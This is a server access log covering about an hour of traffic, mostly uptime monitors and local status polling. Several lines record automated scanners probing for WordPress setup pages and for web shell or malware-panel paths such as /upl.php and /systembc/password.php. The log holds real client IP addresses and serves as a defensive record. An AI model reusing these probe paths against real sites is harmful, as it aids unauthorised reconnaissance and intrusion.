198.177.126.50 - - [16/Jun/2025:00:40:15 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:00:40:44 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
2a06:98c0:3600::103 - - [16/Jun/2025:00:40:55 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [16/Jun/2025:00:41:56 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
93.158.90.37 - - [16/Jun/2025:00:42:12 +0000] "GET /robots.txt HTTP/1.1" 404 10068 "-" "Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A415F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.3"
93.158.91.33 - - [16/Jun/2025:00:42:12 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A415F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.3"
198.177.126.50 - - [16/Jun/2025:00:43:11 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:00:43:14 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
185.218.84.178 - - [16/Jun/2025:00:43:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.57.180.175 - - [16/Jun/2025:00:43:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0"
161.35.43.20 - - [16/Jun/2025:00:44:20 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
161.35.43.20 - - [16/Jun/2025:00:44:20 +0000] "GET /favicon.ico HTTP/1.1" 404 10070 "http://bluveriq.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
161.35.43.20 - - [16/Jun/2025:00:44:21 +0000] "GET /ads.txt HTTP/1.1" 404 10062 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
161.35.43.20 - - [16/Jun/2025:00:44:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
161.35.43.20 - - [16/Jun/2025:00:44:22 +0000] "GET /favicon.ico HTTP/1.1" 404 10070 "https://bluveriq.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
161.35.43.20 - - [16/Jun/2025:00:44:22 +0000] "GET /ads.txt HTTP/1.1" 404 10062 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [16/Jun/2025:00:44:51 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:00:45:01 +0000] "GET /whm-server-status HTTP/1.0" 200 40932 "-" "-"
127.0.0.1 - - [16/Jun/2025:00:45:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:00:45:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:00:45:05 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:00:45:06 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
127.0.0.1 - - [16/Jun/2025:00:45:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
2a06:98c0:3600::103 - - [16/Jun/2025:00:45:43 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.177.126.50 - - [16/Jun/2025:00:46:06 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:00:46:08 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [16/Jun/2025:00:46:12 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:00:46:28 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [16/Jun/2025:00:47:46 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:00:47:52 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.177.126.50 - - [16/Jun/2025:00:49:01 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:00:49:11 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:00:50:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41008 "-" "-"
127.0.0.1 - - [16/Jun/2025:00:50:02 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:00:50:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1446 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:00:50:04 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:00:50:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1445 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:00:50:40 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.54.118.134 - - [16/Jun/2025:00:50:41 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:00:51:56 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:00:52:09 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:00:53:37 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:00:54:51 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:00:55:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41014 "-" "-"
127.0.0.1 - - [16/Jun/2025:00:55:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1447 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:00:55:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1448 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:00:55:06 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:00:55:07 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1448 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [16/Jun/2025:00:55:07 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:00:56:13 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.54.118.134 - - [16/Jun/2025:00:56:32 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
43.133.59.59 - - [16/Jun/2025:00:57:09 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.177.126.50 - - [16/Jun/2025:00:57:46 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:00:58:06 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:00:59:27 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:00:02 +0000] "GET /whm-server-status HTTP/1.0" 200 40901 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:00:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1366 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:00:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1367 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:00:09 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:01:00:10 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1367 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:01:00:41 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:01:01:04 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:02:09 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.54.118.134 - - [16/Jun/2025:01:02:22 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:01:03:37 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:01:04:03 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:05:02 +0000] "GET /whm-server-status HTTP/1.0" 200 41001 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:05:03 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1452 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:05:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:05:07 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:01:05:08 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.54.118.134 - - [16/Jun/2025:01:05:18 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:01:06:11 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.177.126.50 - - [16/Jun/2025:01:06:32 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:01:06:34 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [16/Jun/2025:01:07:01 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:01:07:11 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
127.0.0.1 - - [16/Jun/2025:01:07:18 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
91.134.91.17 - - [16/Jun/2025:01:07:40 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
198.54.118.134 - - [16/Jun/2025:01:08:13 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:01:09:27 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:01:09:43 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [16/Jun/2025:01:10:00 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:10:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41235 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:10:04 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1452 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:10:07 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1448 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:10:10 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:01:10:12 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
144.172.105.141 - - [16/Jun/2025:01:10:21 +0000] "GET / HTTP/1.1" 200 163 "http://159.198.77.92:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
198.54.118.134 - - [16/Jun/2025:01:11:08 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:01:12:22 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:01:12:58 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:13:36 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.54.118.134 - - [16/Jun/2025:01:14:03 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:15:02 +0000] "GET /whm-server-status HTTP/1.0" 200 41156 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:15:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1452 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:15:09 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1450 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:15:14 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:01:15:17 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1455 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:01:15:17 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:01:15:57 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:01:16:59 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
204.76.203.212 - - [16/Jun/2025:01:17:09 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.177.126.50 - - [16/Jun/2025:01:18:15 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:01:18:55 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:19:20 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.54.118.134 - - [16/Jun/2025:01:19:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:20:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41046 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:20:05 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1454 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:20:10 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1455 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:20:15 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:01:20:18 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1457 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:01:21:14 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:01:21:54 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:01:22:49 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:01:24:12 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:01:24:48 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [16/Jun/2025:01:24:52 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:25:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41196 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:25:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1454 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:25:12 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1456 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:25:18 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:01:25:21 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1456 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:25:22 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
23.27.145.18 - - [16/Jun/2025:01:25:31 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0"
198.54.118.134 - - [16/Jun/2025:01:25:44 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
185.247.137.230 - - [16/Jun/2025:01:26:20 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
2a06:98c0:3600::103 - - [16/Jun/2025:01:26:49 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.177.126.50 - - [16/Jun/2025:01:27:11 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:01:27:43 +0000] "GET /wordpress/wp-admin/setup-config.php HTTP/1.1" 404 10118 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
209.74.73.66 - - [16/Jun/2025:01:27:50 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
2a06:98c0:3600::103 - - [16/Jun/2025:01:28:06 +0000] "GET /wp-admin/setup-config.php HTTP/1.1" 404 10098 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
198.54.118.134 - - [16/Jun/2025:01:28:40 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:30:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41448 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:30:06 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1456 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:01:30:09 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:30:11 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1455 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:30:17 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
43.153.113.127 - - [16/Jun/2025:01:30:19 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
127.0.0.1 - - [16/Jun/2025:01:30:20 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1457 "-" "munin/2.0.73 (libwww-perl/6.67)"
209.74.73.66 - - [16/Jun/2025:01:30:49 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:31:20 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
198.54.118.134 - - [16/Jun/2025:01:31:35 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:01:33:08 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:01:33:47 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:01:34:30 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:35:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41367 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:35:08 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1456 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:35:14 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1458 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:35:20 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
127.0.0.1 - - [16/Jun/2025:01:35:24 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1456 "-" "munin/2.0.73 (libwww-perl/6.67)"
198.177.126.50 - - [16/Jun/2025:01:36:06 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:36:24 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
209.74.73.66 - - [16/Jun/2025:01:36:46 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:01:37:26 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.177.126.50 - - [16/Jun/2025:01:39:27 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
184.105.139.68 - - [16/Jun/2025:01:39:39 +0000] "\x16\x03\x01" 400 10073 "-" "-"
209.74.73.66 - - [16/Jun/2025:01:39:44 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:40:01 +0000] "GET /whm-server-status HTTP/1.0" 200 41317 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:40:07 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1456 "-" "munin/2.0.73 (libwww-perl/6.67)"
127.0.0.1 - - [16/Jun/2025:01:40:12 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1456 "-" "munin/2.0.73 (libwww-perl/6.67)"
::1 - - [16/Jun/2025:01:40:18 +0000] "GET / HTTP/1.1" 200 163 "-" "Munin - http_loadtime"
198.54.118.134 - - [16/Jun/2025:01:40:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
127.0.0.1 - - [16/Jun/2025:01:40:22 +0000] "GET /whm-server-status?auto HTTP/1.1" 200 1457 "-" "munin/2.0.73 (libwww-perl/6.67)"
43.159.60.229 - - [16/Jun/2025:01:40:57 +0000] "GET / HTTP/1.1" 200 163 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
127.0.0.1 - - [16/Jun/2025:01:41:29 +0000] "GET / HTTP/1.0" 200 163 "-" "-"
45.58.159.238 - - [16/Jun/2025:01:41:48 +0000] "GET /upl.php HTTP/1.1" 404 10065 "-" "Mozilla/5.0"
45.58.159.238 - - [16/Jun/2025:01:41:49 +0000] "GET /t4 HTTP/1.1" 404 10055 "-" "Mozilla/5.0"
45.58.159.238 - - [16/Jun/2025:01:41:49 +0000] "GET /geoip/ HTTP/1.1" 404 10063 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.159.238 - - [16/Jun/2025:01:41:49 +0000] "GET /favicon.ico HTTP/1.1" 404 10073 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.159.238 - - [16/Jun/2025:01:41:50 +0000] "GET /password.php HTTP/1.1" 404 10075 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.159.238 - - [16/Jun/2025:01:41:50 +0000] "\x16\x03\x01" 400 10073 "-" "-"
45.58.159.238 - - [16/Jun/2025:01:41:50 +0000] "\x16\x03\x01" 400 10073 "-" "-"
45.58.159.238 - - [16/Jun/2025:01:41:51 +0000] "\x16\x03\x01" 400 10073 "-" "-"
45.58.159.238 - - [16/Jun/2025:01:41:51 +0000] "GET /form.html HTTP/1.1" 404 10069 "-" "curl/8.1.2"
45.58.159.238 - - [16/Jun/2025:01:41:51 +0000] "GET /1.php HTTP/1.1" 404 10061 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
45.58.159.238 - - [16/Jun/2025:01:41:51 +0000] "GET /systembc/password.php HTTP/1.1" 404 10093 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
198.177.126.50 - - [16/Jun/2025:01:42:21 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
209.74.73.66 - - [16/Jun/2025:01:42:39 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
198.54.118.134 - - [16/Jun/2025:01:43:16 +0000] "GET / HTTP/1.1" 200 163 "-" "Namecheap Monitoring Agent"
204.76.203.206 - - [16/Jun/2025:01:44:26 +0000] "GET / HTTP/1.1" 200 163 "-" "-"
127.0.0.1 - - [16/Jun/2025:01:45:02 +0000] "GET /whm-server-status HTTP/1.0" 200 41398 "-" "-"
